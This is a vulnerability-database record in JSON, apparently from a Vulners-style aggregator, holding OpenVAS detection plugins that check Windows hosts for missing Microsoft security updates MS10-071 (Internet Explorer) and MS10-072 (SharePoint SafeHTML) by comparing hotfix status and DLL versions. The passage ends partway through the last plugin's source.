{"id": "OPENVAS:901162", "vendorId": null, "type": "openvas", "bulletinFamily": "scanner", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2360131)", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-071.", "published": "2010-10-13T00:00:00", "modified": "2017-07-05T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "http://plugins.openvas.org/nasl.php?oid=901162", "reporter": "Copyright (C) 2010 SecPod", "references": ["http://support.microsoft.com/kb/2360131", "http://www.microsoft.com/technet/security/bulletin/ms10-071.mspx", "http://www.vupen.com/english/advisories/2010/2618"], "cvelist": ["CVE-2010-3331", "CVE-2010-0808", "CVE-2010-3330", "CVE-2010-3328", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3243", "CVE-2010-3326", "CVE-2010-3329", "CVE-2010-3327"], "immutableFields": [], "lastseen": "2017-07-20T08:49:13", "viewCount": 13, "enchantments": {"score": {"value": 0.3, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-271", "CPAI-2010-272", "CPAI-2010-284", "CPAI-2010-286", "CPAI-2010-287", "CPAI-2010-288", "CPAI-2010-293", "CPAI-2010-294", "CPAI-2014-0090", "CPAI-2014-1205", "CPAI-2014-2344", "CPAI-2015-0741"]}, {"type": "cve", "idList": ["CVE-2010-0808", "CVE-2010-3243", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3326", "CVE-2010-3327", "CVE-2010-3328", "CVE-2010-3329", "CVE-2010-3330", "CVE-2010-3331"]}, {"type": "exploitdb", "idList": ["EDB-ID:15262"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:33AAE8F01A606FEF492A3296C19EC99F"]}, {"type": "mskb", "idList": ["KB2412048"]}, {"type": "nessus", "idList": ["SAFEHTML_MS10_072.NASL", "SMB_NT_MS10-071.NASL", "SMB_NT_MS10-072.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310901162", "OPENVAS:1361412562310902246", "OPENVAS:1361412562310902626", "OPENVAS:902246", "OPENVAS:902626"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:94815"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24871", "SECURITYVULNS:DOC:24872", "SECURITYVULNS:DOC:24886", "SECURITYVULNS:DOC:24934", "SECURITYVULNS:VULN:11189", "SECURITYVULNS:VULN:11190"]}, {"type": "seebug", "idList": ["SSV:20163", "SSV:20165", "SSV:20167", "SSV:20168", "SSV:20169", "SSV:20170", "SSV:20184"]}, {"type": "symantec", "idList": ["SMNTC-43696", "SMNTC-43705", "SMNTC-43707", "SMNTC-43709"]}, {"type": "zdi", "idList": ["ZDI-10-197"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-294"]}, {"type": "cve", "idList": ["CVE-2010-0808"]}, {"type": "exploitdb", "idList": ["EDB-ID:15262"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:33AAE8F01A606FEF492A3296C19EC99F"]}, {"type": "nessus", "idList": ["SMB_NT_MS10-071.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310902626"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:24872"]}, {"type": "seebug", "idList": ["SSV:20168"]}, {"type": "symantec", "idList": ["SMNTC-43705", "SMNTC-43709"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2010-3331", "epss": "0.940460000", "percentile": "0.986240000", "modified": "2023-03-15"}, {"cve": "CVE-2010-0808", "epss": "0.022800000", "percentile": "0.879230000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3330", "epss": "0.416580000", "percentile": "0.966880000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3328", "epss": "0.957280000", "percentile": "0.990060000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3324", "epss": "0.971960000", "percentile": "0.996510000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3325", "epss": "0.025260000", "percentile": "0.884850000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3243", "epss": "0.932240000", "percentile": "0.984890000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3326", "epss": "0.940460000", "percentile": "0.986240000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3329", "epss": "0.964750000", "percentile": "0.992640000", "modified": "2023-03-15"}, {"cve": "CVE-2010-3327", "epss": "0.018240000", "percentile": "0.863450000", "modified": "2023-03-15"}], "vulnersScore": 0.3}, "_state": {"dependencies": 1678909994, "score": 1683821708, "epss": 1678926051}, "_internal": {"score_hash": "e70a3c750340f7dcabfcf9d1124b9d31"}, "pluginID": "901162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-071.nasl 6527 2017-07-05 05:56:34Z cfischer $\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2360131)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to gain knowledge of\n sensitive information or execute arbitrary code.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Internet Explorer version 6.x/7.x/8.x\";\ntag_insight = \"- The browser allowing for automated, scripted instructions to simulate user\n actions on the AutoComplete feature, which could allow attackers to capture\n information previously entered into fields after the AutoComplete feature\n has been enabled.\n - An error in the way the toStaticHTML API sanitizes HTML, which could allow\n cross-site scripting attacks.\n - An error when processing CSS special characters, which could allow attackers\n to view content from another domain or Internet Explorer zone.\n - An uninitialized memory corruption error when processing malformed data,\n which could allow attackers to execute arbitrary code via a malicious web page.\n - The Anchor element not being removed from the editable HTML element during\n specific user operations, potentially revealing personally identifiable\n information intended for deletion.\n - The browser allowing scripts to access and read content from different domains,\n which could allow cross-domain scripting attacks.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://www.microsoft.com/technet/security/Bulletin/MS10-071.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS10-071.\";\n\nif(description)\n{\n script_id(901162);\n script_version(\"$Revision: 6527 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-05 07:56:34 +0200 (Wed, 05 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-10-13 17:10:12 +0200 (Wed, 13 Oct 2010)\");\n script_cve_id(\"CVE-2010-3331\", \"CVE-2010-3330\", \"CVE-2010-3329\", \"CVE-2010-3328\",\n \"CVE-2010-3327\", \"CVE-2010-3326\", \"CVE-2010-3325\", \"CVE-2010-3243\",\n \"CVE-2010-3324\", \"CVE-2010-0808\");\n script_bugtraq_id(43695,43703,42467,42993,43696,43704,43705,43706,43709,43707);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2360131)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2360131\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2010/2618\");\n script_xref(name : \"URL\" , value : \"http://www.microsoft.com/technet/security/bulletin/ms10-071.mspx\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer){\n exit(0);\n}\n\n## MS10-071 Hotfix (2360131)\nif(hotfix_missing(name:\"2360131\") == 0){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\system32\\Iepeers.dll\";\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath);\n\n## Get Version from Iepeers.dll file\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Iepeers.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0\", test_version2:\"6.0.2900.6035\") ||\n version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6000.17090\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18967\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Iepeers.dll version\n if(version_in_range(version:dllVer, test_version:\"6.0\", test_version2:\"6.0.3790.4771\") ||\n version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6000.17090\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18967\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:2, win2008:2) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n ## Check for Iepeers.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6001.18526\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18974\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Iepeers.dll version\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6002.18308\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18974\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n ## Check for Iepeers.dll version\n if(version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.7600.16670\")){\n security_message(0);\n }\n}\n", "naslFamily": "Windows : Microsoft Bulletins"}
{"openvas": [{"lastseen": "2020-06-10T20:02:56", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS10-071.", "cvss3": {}, "published": "2010-10-13T00:00:00", "type": "openvas", "title": "Microsoft Internet Explorer Multiple Vulnerabilities (2360131)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3331", "CVE-2010-0808", "CVE-2010-3330", "CVE-2010-3328", "CVE-2010-3324", "CVE-2010-3325", "CVE-2010-3243", "CVE-2010-3326", "CVE-2010-3329", "CVE-2010-3327"], "modified": "2020-06-09T00:00:00", "id": "OPENVAS:1361412562310901162", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310901162", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Internet Explorer Multiple Vulnerabilities (2360131)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2010 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.901162\");\n script_version(\"2020-06-09T10:15:40+0000\");\n script_tag(name:\"last_modification\", value:\"2020-06-09 10:15:40 +0000 (Tue, 09 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2010-10-13 17:10:12 +0200 (Wed, 13 Oct 2010)\");\n script_cve_id(\"CVE-2010-3331\", \"CVE-2010-3330\", \"CVE-2010-3329\", \"CVE-2010-3328\",\n \"CVE-2010-3327\", \"CVE-2010-3326\", \"CVE-2010-3325\", \"CVE-2010-3243\",\n \"CVE-2010-3324\", \"CVE-2010-0808\");\n script_bugtraq_id(43695, 43703, 42467, 42993, 43696, 43704, 43705, 43706, 43709, 43707);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Internet Explorer Multiple Vulnerabilities (2360131)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2360131\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2010/2618\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-071\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"gb_ms_ie_detect.nasl\");\n script_mandatory_keys(\"MS/IE/Version\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to gain knowledge of\n sensitive information or execute arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"Microsoft Internet Explorer version 6.x/7.x/8.x.\");\n\n script_tag(name:\"insight\", value:\"- The browser allowing for automated, scripted instructions to simulate user\n actions on the AutoComplete feature, which could allow attackers to capture\n information previously entered into fields after the AutoComplete feature\n has been enabled.\n\n - An error in the way the toStaticHTML API sanitizes HTML, which could allow\n cross-site scripting attacks.\n\n - An error when processing CSS special characters, which could allow attackers\n to view content from another domain or Internet Explorer zone.\n\n - An uninitialized memory corruption error when processing malformed data,\n which could allow attackers to execute arbitrary code via a malicious web page.\n\n - The Anchor element not being removed from the editable HTML element during\n specific user operations, potentially revealing personally identifiable\n information intended for deletion.\n\n - The browser allowing scripts to access and read content from different domains,\n which could allow cross-domain scripting attacks.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS10-071.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\nieVer = get_kb_item(\"MS/IE/Version\");\nif(!ieVer){\n exit(0);\n}\n\n## MS10-071 Hotfix (2360131)\nif(hotfix_missing(name:\"2360131\") == 0){\n exit(0);\n}\n\nsysPath = smb_get_systemroot();\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\system32\\Iepeers.dll\";\nshare = ereg_replace(pattern:\"([A-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[A-Z]:(.*)\", replace:\"\\1\", string:dllPath);\n\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"6.0\", test_version2:\"6.0.2900.6035\") ||\n version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6000.17090\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18967\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"6.0\", test_version2:\"6.0.3790.4771\") ||\n version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6000.17090\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18967\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:2, win2008:2) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6001.18526\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18974\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_in_range(version:dllVer, test_version:\"7.0\", test_version2:\"7.0.6002.18308\")||\n version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.6001.18974\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_in_range(version:dllVer, test_version:\"8.0\", test_version2:\"8.0.7600.16670\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-27T19:23:00", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS10-072.", "cvss3": {}, "published": "2011-09-22T00:00:00", "type": "openvas", "title": "Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3324", "CVE-2010-3243"], "modified": "2020-04-23T00:00:00", "id": "OPENVAS:1361412562310902626", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902626", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902626\");\n script_version(\"2020-04-23T08:43:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-04-23 08:43:39 +0000 (Thu, 23 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-09-22 10:24:03 +0200 (Thu, 22 Sep 2011)\");\n script_cve_id(\"CVE-2010-3243\", \"CVE-2010-3324\");\n script_bugtraq_id(42467, 43703);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2412048\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-072\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to gain sensitie\n information via a specially crafted script using SafeHTML.\");\n script_tag(name:\"affected\", value:\"- Microsoft Office SharePoint Server 2007 Service Pack 2\n\n - Microsoft Windows SharePoint Services 3.0 Service Pack 2\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to the way SafeHTML function sanitizes HTML content.\");\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n script_tag(name:\"summary\", value:\"This host is missing an important security update according to\n Microsoft Bulletin MS10-072.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\n## MS10-072 Hotfix\nif(hotfix_missing(name:\"2345304\") == 1)\n{\n ## Microsoft SharePoint Server 2007\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\n if(registry_key_exists(key:key))\n {\n foreach item (registry_enum_keys(key:key))\n {\n appName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Microsoft Office SharePoint Server 2007\" >< appName)\n {\n dllPath = registry_get_sz(item:\"BinPath\",\n key:\"SOFTWARE\\Microsoft\\Office Server\\12.0\");\n\n if(dllPath)\n {\n dllPath = dllPath + \"web server extensions\\12\\ISAPI\";\n vers = fetch_file_version(sysPath:dllPath,\n file_name:\"Microsoft.office.server.dll\");\n if(vers)\n {\n if(version_is_less(version:vers, test_version:\"12.0.6539.5000\"))\n {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"12.0.6539.5000\", install_path:dllPath);\n security_message(port: 0, data: report);\n exit(0);\n }\n }\n }\n }\n }\n }\n}\n\nif(hotfix_missing(name:\"2345212\") == 0){\n exit(0);\n}\n\n## Microsoft Windows SharePoint Services\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n srvcName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Microsoft Windows SharePoint Services\" >< srvcName)\n {\n dllPath = registry_get_sz(item:\"SharedFilesDir\",\n key:\"SOFTWARE\\Microsoft\\Shared Tools\");\n\n if(!dllPath){\n exit(0);\n }\n\n dllPath = dllPath + \"web server extensions\\12\\BIN\";\n dllVer = fetch_file_version(sysPath:dllPath, file_name:\"Onetutil.dll\");\n\n if(!dllVer){\n exit(0);\n }\n\n if(version_is_less(version:dllVer, test_version:\"12.0.6545.5002\"))\n {\n report = report_fixed_ver(installed_version:dllVer, fixed_version:\"12.0.6545.5002\", install_path:dllPath);\n security_message(port: 0, data: report);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2017-07-02T21:13:42", "description": "This host is missing an important security update according to\n Microsoft Bulletin MS10-072.", "cvss3": {}, "published": "2011-09-22T00:00:00", "type": "openvas", "title": "Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3324", "CVE-2010-3243"], "modified": "2017-02-20T00:00:00", "id": "OPENVAS:902626", "href": "http://plugins.openvas.org/nasl.php?oid=902626", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms10-072.nasl 5362 2017-02-20 12:46:39Z cfi $\n#\n# Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)\n#\n# Authors:\n# Rachana Shetty <srachana@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow remote attackers to gain sensitie\n information via a specially crafted script using SafeHTML.\n Impact Level: Application\";\ntag_affected = \"Microsoft Office SharePoint Server 2007 Service Pack 2\n Microsoft Windows SharePoint Services 3.0 Service Pack 2\";\ntag_insight = \"Multiple flaws are due to the way SafeHTML function sanitizes HTML content.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/MS10-072\";\ntag_summary = \"This host is missing an important security update according to\n Microsoft Bulletin MS10-072.\";\n\nif(description)\n{\n script_id(902626);\n script_version(\"$Revision: 5362 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 13:46:39 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-09-22 10:24:03 +0200 (Thu, 22 Sep 2011)\");\n script_cve_id(\"CVE-2010-3243\", \"CVE-2010-3324\");\n script_bugtraq_id(42467, 43703);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_name(\"Microsoft SharePoint SafeHTML Information Disclosure Vulnerabilities (2412048)\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2412048\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/MS10-072\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2010 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\n## MS10-072 Hotfix\nif(hotfix_missing(name:\"2345304\") == 1)\n{\n ## Microsoft SharePoint Server 2007\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\\";\n\n if(registry_key_exists(key:key))\n {\n foreach item (registry_enum_keys(key:key))\n {\n appName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Microsoft Office SharePoint Server 2007\" >< appName)\n {\n dllPath = registry_get_sz(item:\"BinPath\",\n key:\"SOFTWARE\\Microsoft\\Office Server\\12.0\");\n\n if(dllPath)\n {\n dllPath = dllPath + \"web server extensions\\12\\ISAPI\";\n vers = fetch_file_version(sysPath:dllPath,\n file_name:\"Microsoft.office.server.dll\");\n if(vers)\n {\n ## Check for Microsoft.sharepoint.publishing.dl version < 12.0.6539.5000\n if(version_is_less(version:vers, test_version:\"12.0.6539.5000\"))\n {\n security_message(0);\n exit(0);\n }\n }\n }\n }\n }\n }\n}\n\n## Hotfix check\nif(hotfix_missing(name:\"2345212\") == 0){\n exit(0);\n}\n\n## Microsoft Windows SharePoint Services\nif(!registry_key_exists(key:key)){\n exit(0);\n}\n\nforeach item (registry_enum_keys(key:key))\n{\n srvcName = registry_get_sz(item:\"DisplayName\", key:key + item);\n if(\"Microsoft Windows SharePoint Services\" >< 